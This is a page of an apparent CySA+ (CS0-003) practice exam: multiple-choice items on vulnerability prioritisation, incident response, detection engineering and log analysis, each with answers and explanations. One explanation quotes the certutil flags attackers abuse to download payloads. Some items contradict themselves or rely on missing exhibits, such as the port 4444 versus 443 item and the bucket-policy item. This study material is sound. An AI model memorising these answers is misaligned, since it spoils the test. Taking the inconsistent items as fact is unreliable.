API1:2019 – Broken Object Level Authorization.

Why this answer

Broken object level authorization, excessive data exposure, and broken authentication are common API vulnerabilities listed in OWASP API Security Top 10.

715
MCQmedium

A server team needs to fix an OpenSSL vulnerability across Linux hosts. What should the technical remediation section include? If the primary audience is technical remediation owner, which content choice is most appropriate?

A.Only a red/yellow/green chart
B.Only the CVE headline
C.Affected assets, package versions, patch commands or vendor guidance, validation method, and rollback notes
D.Only estimated financial loss
AnswerC

Technical teams need precise, actionable remediation steps and a way to confirm success. The report should be tuned to technical remediation owner while preserving factual accuracy.

Why this answer

Option C is correct because a technical remediation section must provide actionable steps for the remediation owner. This includes identifying affected assets and package versions, specifying patch commands or vendor guidance, outlining a validation method to confirm the fix, and including rollback notes in case the patch causes issues. Without these details, the remediation owner cannot execute the fix reliably or verify its success.

Exam trap

The CS0-003 exam often tests the distinction between reporting to executives (which uses summary charts) and providing technical remediation details to the remediation owner, leading candidates to mistakenly choose a high-level summary like a chart or CVE headline instead of the actionable, step-by-step content required for the technical audience.

How to eliminate wrong answers

Option A is wrong because a red/yellow/green chart is a status summary for executive reporting, not a technical remediation plan; it lacks the specific commands, versions, and validation steps needed to fix an OpenSSL vulnerability. Option B is wrong because only the CVE headline (e.g., CVE-2024-XXXX) provides no actionable information; the remediation owner needs affected package versions, patch commands, and rollback procedures, not just a vulnerability identifier.

716
MCQmedium

Refer to the exhibit. An analyst sees this output from a workstation. Which of the following is the most likely explanation?

A.The workstation is receiving NTP time synchronization
B.The workstation is performing a port scan
C.The workstation is a web server
D.The workstation is infected with malware connecting to a C2 server
AnswerD

Multiple connections to the same IP on port 4444 is suspicious.

Why this answer

The output shows repeated outbound TCP connections to a single external IP address on port 443 (HTTPS) with varying source ports, which is characteristic of beaconing behavior. Malware often establishes periodic connections to a command-and-control (C2) server to receive instructions or exfiltrate data, and the pattern of multiple connections from different ephemeral ports to the same destination is a common indicator of such activity.

Exam trap

The trap here is that candidates see HTTPS (port 443) and assume legitimate web server or normal browsing, missing the key indicator of repeated outbound connections to a single external IP, which is a hallmark of C2 beaconing rather than typical client-server communication.

How to eliminate wrong answers

Option A is wrong because NTP time synchronization uses UDP port 123, not TCP port 443, and the output shows TCP connections, not NTP packets. Option B is wrong because a port scan typically involves connections to multiple destination ports on a target, not repeated connections to a single destination port from varying source ports. Option C is wrong because a web server listens on TCP port 80 or 443 for inbound connections, whereas this output shows outbound connections from the workstation to an external IP, indicating client-side behavior.

717
MCQmedium

A security analyst is reviewing a SIEM alert indicating a high number of failed authentication attempts from a single IP address against multiple user accounts. The analyst checks the logs and finds the IP belongs to a known vulnerability scanner used by the internal security team. How should the analyst classify this alert?

A.True positive - unauthorized access attempt
B.False positive - authorized activity
C.True positive - lateral movement
D.False negative - missed detection
AnswerB

The activity is legitimate and should be classified as a false positive.

Why this answer

The alert is triggered by authorized activity from a known internal scanner, so it is a false positive. The SIEM rule should be tuned to exclude this scanner or reduce its severity.

718
MCQmedium

During a security incident, the SOC team identifies indicators of compromise (IoCs) related to a new malware strain. Which type of threat intelligence report should be produced for the SOC team to enhance detection?

A.Tactical intelligence report with IoCs and detection signatures
B.Technical intelligence report on malware code analysis
C.Strategic intelligence report on global threat trends
D.Operational intelligence report on threat actor campaigns
AnswerA

Tactical intelligence provides actionable technical details.

Why this answer

Tactical intelligence provides IoCs, TTPs, and actionable details for defenders to detect and mitigate threats.

719
MCQmedium

A vulnerability management team has identified a critical vulnerability with a CVSS score of 9.8. The vulnerability affects a public-facing web server that handles sensitive customer data. The team decides to apply a patch immediately without going through the normal patch testing cycle. What type of patching procedure is this?

A.Rolling patch deployment
B.Patch compliance tracking
C.Emergency patching
D.Standard patch management
AnswerC

Emergency patching is used for urgent vulnerabilities to reduce risk quickly.

Why this answer

When a critical vulnerability is actively exploited or poses immediate risk, emergency patching procedures are used to expedite deployment without standard testing.

720
Multi-Selecthard

A security analyst is prioritizing vulnerabilities for remediation. The analyst has the following information: a vulnerability with a CVSS score of 9.0 that affects a public-facing web server, and a vulnerability with a CVSS score of 7.5 that affects an internal database server with sensitive data. Which two factors should the analyst consider when prioritizing? (Choose two.)

Select 2 answers
A.The presence of known exploits in the wild.
B.The vendor's patch release date.
C.The asset's exposure and criticality.
D.The number of open ports on each server.
E.The vulnerability publication date.
AnswersA, C

Active exploits increase urgency.

Why this answer

Option A is correct because the presence of known exploits in the wild directly impacts the likelihood of a vulnerability being weaponized. Even a high CVSS score (e.g., 9.0) may be less urgent if no exploit exists, while a lower-scored vulnerability (e.g., 7.5) with active exploitation poses an immediate threat. This aligns with the CVSS environmental metrics and threat intelligence integration in vulnerability management.

Exam trap

The CS0-003 exam often tests the misconception that CVSS score alone determines priority, whereas the correct approach combines CVSS with threat intelligence (exploit availability) and asset criticality/exposure.

721
MCQmedium

During a security incident, the SOC analyst determines that the attack is originating from an internal IP address belonging to the finance department. The incident response plan requires escalation to the appropriate team. Which of the following should the analyst contact first?

A.The legal department to handle potential compliance issues.
B.The system administrator for the finance department to isolate the host.
C.The finance department manager to confirm if the activity is authorized.
D.The human resources department for disciplinary action.
AnswerC

Verifying with the department manager confirms if the activity is legitimate before further action.

Why this answer

Option C is correct because the incident response plan requires confirmation of authorization before taking containment actions. Since the activity originates from an internal IP in the finance department, the analyst must first contact the finance department manager to verify whether the traffic is legitimate business use (e.g., a scheduled audit or approved data transfer). This step prevents unnecessary disruption and aligns with the 'verify before act' principle in NIST SP 800-61 incident handling.

Exam trap

CompTIA often tests the misconception that technical containment (e.g., isolating a host) should be the immediate next step, but the correct sequence requires verifying authorization first to avoid disrupting legitimate business operations.

How to eliminate wrong answers

Option A is wrong because legal department involvement is premature at this stage; compliance issues are only considered after unauthorized activity is confirmed, not before verifying authorization. Option B is wrong because isolating the host without first confirming the activity is authorized could disrupt legitimate business operations and violates the containment-first-verify principle; system administrators are contacted after authorization is denied. Option D is wrong because HR disciplinary action is a post-incident response step, only relevant after unauthorized activity is confirmed and attributed to an individual, not during initial triage.

722
MCQmedium

A host alert shows certutil.exe downloading a file from an external URL, followed by execution from a user-writable directory. What should the analyst focus on? In the root-cause analysis phase, Which finding would most directly explain the activity?

A.Reinstall the browser used by the user
B.Living-off-the-land binary misuse and the downloaded file's hash, origin, and child process
C.Ignore it because certutil is signed by Microsoft
D.Only check whether antivirus signatures are current
AnswerB

Certutil can be abused to download payloads; file and process context establishes whether execution is malicious.

Why this answer

Option B is correct because certutil.exe is a known living-off-the-land binary (LOLBin) that attackers abuse to download payloads from external URLs, bypassing application whitelisting. The root-cause analysis must focus on the downloaded file's hash (to identify malware), its origin (the external URL), and any child processes spawned (to trace execution chain), as these directly explain the malicious activity.

Exam trap

The CS0-003 exam often tests the misconception that signed Microsoft binaries are inherently safe, tricking candidates into ignoring LOLBin abuse, when the real focus should be on the downloaded file's hash, origin, and execution chain.

How to eliminate wrong answers

Option A is wrong because reinstalling the browser does not address the root cause; the attack used certutil.exe, not the browser, so the browser is irrelevant to the download or execution. Option C is wrong because ignoring the alert due to certutil being signed by Microsoft is a dangerous misconception; attackers exploit legitimate signed binaries (LOLBins) to evade detection, and the activity is clearly anomalous and requires investigation.

723
Multi-Selectmedium

Which items belong in a vulnerability exception request? (Choose three.)

Select 3 answers
A.Business justification for delayed remediation
B.A request to remove the asset from inventory
C.Expiration or review date
D.Compensating controls
AnswersA, C, D

Justification explains why normal remediation cannot occur.

Why this answer

A vulnerability exception request is a formal process to accept the risk of not remediating a vulnerability within the standard timeframe. A business justification for delayed remediation is a core component because it documents the operational, financial, or technical reasons why the fix cannot be applied immediately, which is required for risk acceptance by management. Without this justification, the exception lacks the necessary context for approval and audit compliance.

Exam trap

The CS0-003 exam often tests the distinction between operational risk acceptance (exception request) and asset lifecycle management (decommissioning), leading candidates to incorrectly include asset removal as part of the exception process.

724
MCQmedium

An analyst needs to collect evidence for a compliance audit. Which type of evidence is most appropriate to demonstrate that access reviews are performed regularly?

A.Vulnerability scan reports
B.Access review reports
C.Configuration backups
D.Log exports of user activity
AnswerB

These reports document the review process and decisions.

Why this answer

Access review reports serve as direct evidence that reviews are conducted, showing dates and outcomes.

725
MCQeasy

A security analyst reviews the above bucket policy. Which of the following BEST describes the risk associated with this policy?

A.The bucket is publicly readable, potentially exposing sensitive data
B.The bucket allows anyone to upload malicious files
C.The bucket enforces encryption in transit
D.The bucket requires authentication for access
AnswerA

Principal: * allows unauthenticated access.

Why this answer

Option A is correct because the policy allows any anonymous user to read objects. Option B is wrong because it's a GET, not PUT. C is wrong because the policy does not require authentication.

D is wrong because encryption is not addressed.

726
MCQhard

A security team uses the Common Vulnerability Scoring System (CVSS) v3.1 to prioritize vulnerabilities. They find a vulnerability with a base score of 7.5 and vector AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H. However, the asset is a public-facing web server with no backups. The team also checks the Exploit Prediction Scoring System (EPSS) and sees a score of 0.95 (95% probability of exploitation in the next 30 days). Which action should the team take first based on prioritizing by risk?

A.Expedite patch testing and deployment, and consider emergency change procedures
B.Apply the patch within the next 30 days as part of routine maintenance
C.Implement a network-based intrusion prevention system signature to block exploitation attempts
D.Deploy the patch immediately in the production environment without testing
AnswerA

Given the high EPSS and critical asset, the patch should be expedited with emergency change management.

Why this answer

The high EPSS score indicates imminent exploitation, and the impact to availability is high. The CVSS impact reflects a potential denial of service, which is critical for a public-facing server. The lack of backups increases the risk of data loss or extended downtime.

Therefore, immediate patching is the priority.

727
MCQmedium

During the detection and analysis phase of incident response, a security analyst identifies suspicious outbound traffic from a workstation to an external IP address known for command and control (C2) activity. Which classification should the analyst assign to this incident?

A.Insider threat
B.Data breach
C.Phishing
D.Malware
AnswerD

C2 communication is a classic indicator of malware infection, such as a botnet or trojan.

Why this answer

The incident involves communication with a known C2 server, which is characteristic of a malware infection (specifically, a botnet or trojan). This falls under the malware category.

728
MCQmedium

A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the containment trade-off phase, Which response balances containment with evidence preservation?

A.Sign-in logs, MFA result, device details, and mailbox audit events
B.The organisation's public DNS zone file
C.Only the user's browser cache
D.Only DHCP logs from the London office
AnswerA

Impossible travel plus forwarding rule creation is a strong account-compromise pattern; identity and mailbox audit data confirm whether the activity is malicious.

Why this answer

Option A is correct because the UEBA rule indicates a possible account compromise (impossible travel followed by mailbox rule creation). The analyst must first verify the sign-in logs for authentication source IPs, MFA result to check if the attacker bypassed MFA, device details to identify if a known device was used, and mailbox audit events to confirm the forwarding rule. These four data sources provide the minimum evidence needed to assess the scope of compromise before containment.

Exam trap

The CS0-003 exam often tests the candidate's ability to prioritize server-side logs (sign-in, MFA, audit) over client-side artifacts (browser cache) or unrelated infrastructure (DNS zone file) when investigating a UEBA alert for account compromise.

How to eliminate wrong answers

Option B is wrong because the organisation's public DNS zone file is irrelevant to a user-level authentication and mailbox rule anomaly; DNS records do not contain user sign-in or mailbox audit data. Option C is wrong because the user's browser cache is a client-side artifact that may be overwritten or inaccessible, and it does not provide server-side evidence of authentication events or mailbox rule creation, which are critical for forensic analysis.

729
MCQhard

During a security incident, a SOC analyst identifies that customer PII has been exfiltrated. The company operates in multiple states and processes EU residents' data. Which of the following is the MOST critical immediate communication requirement?

A.Notify law enforcement within 24 hours
B.Notify affected customers within 48 hours
C.Notify the relevant data protection authority within 72 hours
D.Issue a press release within 24 hours
AnswerC

GDPR 72-hour rule for supervisory authority notification.

Why this answer

GDPR requires notification to the supervisory authority within 72 hours of becoming aware of a breach involving personal data.

730
Multi-Selectmedium

A security analyst is conducting a vulnerability assessment on a cloud environment and needs to select a tool to scan for misconfigurations against the CIS AWS Foundations Benchmark. Which TWO of the following tools are capable of performing compliance scanning against cloud benchmarks? (Select TWO.)

Select 2 answers
A.Nessus
B.Qualys
C.OpenSCAP
D.ScoutSuite
E.Wireshark
AnswersC, D

Correct; OpenSCAP can evaluate systems against CIS benchmarks, including cloud.

Why this answer

OpenSCAP and cloud-specific tools like ScoutSuite (or Prowler) can assess cloud configurations against CIS benchmarks. Nessus and Qualys primarily do vulnerability scanning, though they may have some compliance modules, but the question expects tools specifically for cloud benchmarks. OpenSCAP can be used with cloud content, and ScoutSuite is a cloud security auditing tool.

731
MCQhard

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

A.Only physical datacenter access logs
B.Only user password age reports
C.Container runtime events, Kubernetes audit logs, and network flow from the pod
D.Only monthly vulnerability scan summaries
AnswerC

Runtime, orchestration, and network telemetry together show process execution, privilege context, and external communication.

Why this answer

Container runtime events (e.g., from containerd or CRI-O) capture process spawns like a shell inside the container, Kubernetes audit logs record API calls that mount host paths (e.g., `hostPath` volumes), and network flow logs (e.g., from CNI plugins or eBPF) show outbound connections to unknown IPs. Together, these three telemetry sources provide the full kill chain—execution, privilege escalation, and exfiltration—making option C the most useful for detection engineering.

Exam trap

The CS0-003 exam often tests the misconception that host-level logs (like datacenter access or password reports) are sufficient for container security, when in fact container-specific telemetry is required to detect runtime anomalies like shell execution and unauthorized mounts.

How to eliminate wrong answers

Option A is wrong because physical datacenter access logs track who entered the facility, not container-level activities like shell execution or network flows; they are irrelevant to a workload compromise. Option B is wrong because user password age reports indicate password policy compliance, not real-time runtime behavior; they cannot detect a shell spawning or outbound connections from a container.

732
Multi-Selectmedium

A company has experienced a ransomware attack that encrypted critical servers. The incident response team is in the containment, eradication, and recovery phase. Which THREE actions are part of long-term containment? (Choose three.)

Select 3 answers
A.Apply security patches to vulnerable systems
B.Rotate all privileged account credentials
C.Isolate the infected systems from the network
D.Block the ransomware's C2 domain at the firewall
E.Rebuild affected servers from clean backups
AnswersA, B, E

Correct. Patching addresses root cause.

Why this answer

Long-term containment involves actions to prevent recurrence, such as patching, rebuilding systems, and rotating credentials.

733
MCQeasy

An incident responder is classifying an incident. The incident involves ransomware encrypting files on multiple workstations, causing significant business disruption. Which severity level should be assigned to this incident?

A.Medium
B.High
C.Informational
D.Low
AnswerB

High severity incidents cause significant disruption, like ransomware on multiple systems.

Why this answer

Ransomware affecting multiple workstations causes high impact and likely critical business disruption, so it should be classified as high or critical severity. The highest typical level is 'Critical' (or similar).

734
MCQmedium

A legacy system cannot be patched because the vendor no longer supports the application. What should the vulnerability manager request? For validation, Which action should be taken before closing or downgrading the finding?

A.Give all users local admin rights
B.Mark the vulnerability as fixed
C.Documented risk acceptance with compensating controls and a migration/remediation plan
D.Remove the system from future reports
AnswerC

Unsupported systems need formal exception handling, mitigation, ownership, and an exit path.

Why this answer

When a legacy system cannot be patched due to vendor end-of-life, the vulnerability manager must formally accept the risk by documenting the risk acceptance, implementing compensating controls (e.g., network segmentation, host-based firewall rules, or application whitelisting), and creating a migration or remediation plan to eventually retire or replace the system. This aligns with the NIST SP 800-53 risk management framework and ensures auditability.

Exam trap

The CS0-003 exam often tests the misconception that 'no patch available' means the vulnerability can be closed as 'fixed' or that compensating controls alone are sufficient without formal documentation and a plan.

How to eliminate wrong answers

Option A is wrong because granting all users local admin rights would increase the attack surface and privilege escalation risk, directly violating the principle of least privilege and potentially making the system more vulnerable. Option B is wrong because marking the vulnerability as fixed when no patch has been applied is a false positive closure; vulnerabilities must be remediated, mitigated, or formally accepted, not simply closed without evidence.

735
MCQeasy

A vulnerability scan report shows a critical vulnerability with a CVSS score of 10.0. The application team states that the affected service is isolated in a DMZ and has no access to sensitive data. What should the analyst consider?

A.Accept the risk based on compensating controls
B.Reclassify the vulnerability as low severity
C.Immediately patch the vulnerability
D.Ignore the finding as a false positive
AnswerA

The isolation in the DMZ serves as a compensating control, reducing the likelihood of exploitation.

Why this answer

Compensating controls like network isolation can reduce the risk even if the vulnerability itself is critical.

736
MCQmedium

A vulnerability management analyst is reviewing scan results from a recent Nessus scan. The analyst notices a plugin with the output: 'The remote host is missing a security patch for CVE-2023-1234. The patch was released by the vendor on 2023-05-01.' Which phase of the vulnerability lifecycle is the analyst currently performing?

A.Prioritization
B.Remediation
C.Verification
D.Discovery
AnswerD

Discovery is the process of identifying vulnerabilities through scanning.

Why this answer

The analyst is reviewing scan results to identify vulnerabilities, which is the discovery phase of the vulnerability lifecycle.

737
Multi-Selectmedium

A SOC wants to reduce alert fatigue without missing confirmed malicious activity. Which actions are appropriate? (Choose two.)

Select 2 answers
A.Suppress alerts only with documented criteria and expiry
B.Delete noisy detections permanently without review
C.Route every alert directly to executives
D.Add enrichment such as asset criticality and threat-intel context
AnswersA, D

Time-bound suppression preserves governance.

Why this answer

Option A is correct because suppressing alerts based on documented criteria (e.g., known false-positive signatures, scheduled maintenance windows) with an expiry date ensures that the suppression is temporary and reviewed periodically. This reduces alert fatigue while maintaining visibility into potential threats, as expired suppressions automatically re-enable alerting. Without an expiry, a suppression could inadvertently hide malicious activity that later matches the same criteria.

Exam trap

The CS0-003 exam often tests the misconception that permanently deleting noisy detections is acceptable, but the trap is that this violates the principle of defense in depth by removing the ability to detect future variations of the same threat.

738
Multi-Selectmedium

During a threat hunt, an analyst is looking for signs of lateral movement using pass-the-hash. Which three of the following log sources would be most useful for detecting this technique?

Select 3 answers
A.DNS query logs
B.Sysmon Event ID 3 (network connection)
C.Domain controller authentication logs
D.Sysmon Event ID 1 (process creation)
E.Windows Security Event Log (Event ID 4624)
AnswersB, C, E

Network connections from a host to many others can indicate lateral movement.

Why this answer

Pass-the-hash involves using NTLM hashes to authenticate. Windows Event ID 4624 (successful logon) can show logon type 3 (network) with unusual source IPs. Sysmon Event ID 3 (network connection) can show outbound connections.

Authentication logs on domain controllers show NTLM authentication attempts.

739
Multi-Selectmedium

A security analyst is creating a SIEM correlation rule to detect lateral movement using pass-the-hash attacks. The rule should trigger when multiple successful logins occur from a single source to multiple destinations using NTLM authentication. Which THREE log sources are essential for this rule? (Choose THREE.)

Select 3 answers
A.Windows Event ID 4776 (NTLM authentication) logs from domain controllers
B.Windows Event ID 4624 (Logon) logs from workstations
C.DNS logs from the internal DNS server
D.Firewall logs showing outbound connections
E.Authentication logs from the source machine showing logon type 3
AnswersA, B, E

Correct. These capture NTLM authentication attempts.

Why this answer

Windows Event IDs 4624 (successful logon) and 4776 (NTLM authentication) are key. Authentication logs on domain controllers also capture NTLM events.

740
MCQmedium

A network sensor must detect exploit traffic using packet payload signatures and generate alerts without blocking traffic. Which deployment is BEST? In the alert triage phase, Which action gives the analyst the clearest next triage step?

A.Suricata or Snort in IDS mode on a monitored network tap or SPAN port
B.A vulnerability scanner run once per quarter
C.Host-based file integrity monitoring only
D.Inline IPS mode with drop rules for all signatures
AnswerA

IDS mode observes traffic and alerts on signatures while avoiding inline blocking impact.

Why this answer

Suricata or Snort in IDS mode on a monitored network tap or SPAN port is correct because it passively inspects packet payloads against signatures without affecting traffic flow, meeting the requirement to detect exploit traffic and generate alerts without blocking. IDS mode ensures no inline packet drops, while a tap or SPAN port provides full packet visibility for signature matching.

Exam trap

The CS0-003 exam often tests the distinction between IDS and IPS modes, where candidates mistakenly choose inline IPS (Option D) because they think blocking is required for security, but the question explicitly states 'without blocking traffic,' making passive IDS the correct choice.

How to eliminate wrong answers

Option B is wrong because a vulnerability scanner run once per quarter is a proactive assessment tool that does not provide real-time packet payload inspection or alert generation for exploit traffic. Option C is wrong because host-based file integrity monitoring only detects changes to files on a host, not network-based exploit traffic in packet payloads. Option D is wrong because inline IPS mode with drop rules for all signatures actively blocks traffic, which violates the requirement to generate alerts without blocking traffic.

741
MCQmedium

A cloud posture scan finds a storage bucket with public read access containing customer exports. What should the team do first? For business prioritization, Which recommendation gives the best risk-based order of work?

A.Delete all audit logs to reduce liability
B.Wait for the next quarterly review
C.Restrict public access and determine whether sensitive data was accessed
D.Rotate database administrator passwords only
AnswerC

The priority is exposure containment and impact assessment.

Why this answer

Option C is correct because the immediate priority is to contain the data exposure by restricting public access to the storage bucket, then investigate whether sensitive data was actually accessed by unauthorized parties. This aligns with the vulnerability management principle of 'contain first, investigate second' and addresses the risk of data exfiltration without waiting for a scheduled review or performing unrelated actions.

Exam trap

The trap here is that candidates may choose to rotate passwords (Option D) as a generic security response, but the question specifically tests the ability to prioritize containment of the exposed resource over unrelated credential changes.

How to eliminate wrong answers

Option A is wrong because deleting audit logs destroys forensic evidence needed to determine the scope of the breach and violates compliance requirements (e.g., GDPR, PCI DSS) that mandate retention of logs for incident investigation. Option B is wrong because waiting for the next quarterly review leaves the bucket publicly accessible, allowing continued unauthorized access and potential data exfiltration, which is unacceptable for a critical finding. Option D is wrong because rotating database administrator passwords does not address the storage bucket's public read access; it is an unrelated control that does not mitigate the immediate exposure of customer exports.

742
MCQmedium

An EDR alert shows that a process named svchost.exe with parent process cmd.exe executed a PowerShell command to create a scheduled task. The scheduled task runs a script from a remote share. What should the analyst suspect?

A.Lateral movement via scheduled tasks
B.Normal administrative activity
C.Memory injection attack
D.Persistence mechanism using a LOLBin
AnswerD

Correct. Scheduled tasks are a common persistence method, and svchost.exe is abused as a LOLBin.

Why this answer

The parent-child relationship is abnormal: svchost.exe should not have cmd.exe as its parent. This indicates a living off the land (LOLBin) technique using svchost.exe to execute malicious code.

743
Multi-Selectmedium

A cybersecurity analyst is reviewing the configuration of a Linux server against CIS Benchmarks. The analyst notices that several settings deviate from the recommended baseline. Which TWO of the following are most likely to be considered Level 1 CIS Benchmark recommendations?

Select 2 answers
A.Remove all unnecessary packages and services
B.Enable mandatory access control (SELinux) in enforcing mode
C.Set password expiration to 90 days
D.Disable SSH root login
E.Configure audit rules for file permission changes
AnswersC, D

Password aging is a fundamental security control with low impact.

Why this answer

CIS Level 1 recommendations are basic security settings that do not cause significant operational impact. Setting password expiration and disabling root SSH login are common Level 1 items.

744
MCQmedium

A security analyst is reviewing a DAST report from Burp Suite for a web application. The report indicates a potential Server-Side Request Forgery (SSRF) vulnerability in a feature that fetches URLs. Which of the following is the most effective mitigation?

A.Use a whitelist of allowed URLs and validate user input against it.
B.Disable the URL fetching feature entirely.
C.Increase memory limits on the server to prevent resource exhaustion.
D.Implement a Web Application Firewall (WAF) to block malicious requests.
AnswerA

Whitelisting prevents the server from making requests to arbitrary URLs.

Why this answer

SSRF can be mitigated by validating and sanitizing user input, whitelisting allowed URLs, and blocking access to internal networks.

745
Multi-Selecthard

A security analyst is investigating a potential insider threat where a user is suspected of exfiltrating sensitive data via USB drives. The analyst needs to gather evidence while preserving the chain of custody. Which THREE actions should the analyst perform? (Choose THREE.)

Select 3 answers
A.Creating a forensic image of the USB drive using a write blocker
B.Disabling the user's network account immediately
C.Interviewing the user about their activities
D.Documenting the chain of custody for the USB drive
E.Computing a hash of the original USB drive and the forensic image
AnswersA, D, E

This captures the drive data without alteration.

Why this answer

Forensic sound procedures include imaging the drive, hashing to verify integrity, and documenting the chain of custody. Disabling the account is containment, and interviewing is not part of evidence collection.

746
MCQmedium

During a vulnerability assessment, a security analyst discovers a critical vulnerability affecting a legacy application that cannot be patched due to vendor end-of-life status. Which of the following is the BEST next step?

A.Document the risk and implement compensating controls
B.Remove the legacy application from the network immediately
C.Disable the application until a patch becomes available
D.Apply a virtual patch via an intrusion prevention system
AnswerA

This aligns with the vulnerability management lifecycle: when patching is not possible, compensating controls should be implemented and documented.

Why this answer

When a patch is not available, implementing compensating controls is the best approach to mitigate risk. This may include network segmentation, access controls, or additional monitoring.

747
MCQmedium

An analyst is reviewing a suspicious executable using static analysis. Which of the following would provide information about the functions the executable imports from system libraries?

A.Import table analysis
B.PE header analysis
C.String extraction
D.YARA rule creation
AnswerA

Correct. The import table shows imported functions.

Why this answer

The import table lists DLLs and functions that the executable uses, revealing potential capabilities.

748
MCQmedium

A security analyst is reviewing a vulnerability scan report and sees a finding for a web application with a CVSS v3.1 base score of 6.1. The vector string is AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N. Which OWASP Top 10 category does this vulnerability most likely belong to?

A.A03: Injection
B.A05: Security Misconfiguration
C.A06: Vulnerable and Outdated Components
D.A01: Broken Access Control
AnswerA

Cross-site scripting is a form of injection, and in OWASP Top 10 2021, it is part of A03: Injection.

Why this answer

The vector indicates Reflected XSS (requires user interaction, scope change, low CIA impact). Reflected XSS is part of the OWASP Top 10 category 'Injection' (2017) or 'Cross-site Scripting' (2021). However, the most direct is Cross-site Scripting (XSS).

749
MCQmedium

A vulnerability management team is prioritizing remediation of several vulnerabilities. They have access to EPSS scores and the CISA KEV catalog. Which factor should they consider FIRST when deciding which vulnerability to remediate?

A.The vulnerability with the highest base CVSS score
B.The vulnerability listed in the CISA Known Exploited Vulnerabilities catalog
C.The vulnerability affecting the most critical asset
D.The vulnerability with the highest EPSS score
AnswerB

Known exploited vulnerabilities should be prioritized due to active exploitation.

Why this answer

The CISA KEV catalog contains vulnerabilities that are actively exploited in the wild. These pose immediate risk and should be addressed before others, regardless of EPSS score or other factors.

750
MCQmedium

A host alert shows certutil.exe downloading a file from an external URL, followed by execution from a user-writable directory. What should the analyst focus on? In the containment trade-off phase, Which response balances containment with evidence preservation?

A.Ignore it because certutil is signed by Microsoft
B.Reinstall the browser used by the user
C.Living-off-the-land binary misuse and the downloaded file's hash, origin, and child process
D.Only check whether antivirus signatures are current
AnswerC

Certutil can be abused to download payloads; file and process context establishes whether execution is malicious.

Why this answer

Option C is correct because certutil.exe is a known living-off-the-land binary (LOLB) that attackers abuse to download payloads, bypassing application whitelisting. The analyst must focus on the downloaded file's hash (for threat intelligence), its origin URL (to assess the C2 infrastructure), and any child processes spawned (to trace the execution chain). In the containment trade-off phase, preserving these artifacts is critical for forensic analysis while isolating the host.

Exam trap

The CS0-003 exam often tests the misconception that signed Microsoft binaries are inherently safe, but the trap here is that certutil.exe is a dual-use tool—legitimate for administrators but weaponized by attackers for LOLB attacks.

How to eliminate wrong answers

Option A is wrong because certutil being signed by Microsoft does not make it safe; attackers abuse its legitimate functionality (e.g., -urlcache -split -f) to download malicious files, a classic LOLB technique. Option B is wrong because reinstalling the browser does not address the root cause—the misuse of a system binary—and destroys evidence of the download and execution chain. Option D is wrong because antivirus signatures are reactive and may miss fileless or obfuscated payloads; the analyst must investigate the downloaded file's hash and behavior, not just signature currency.

Page 9

Page 10 of 14

Page 11
CompTIA CySA+ CS0-003 CS0-003 Questions 676–750 | Page 10/14 | Courseiva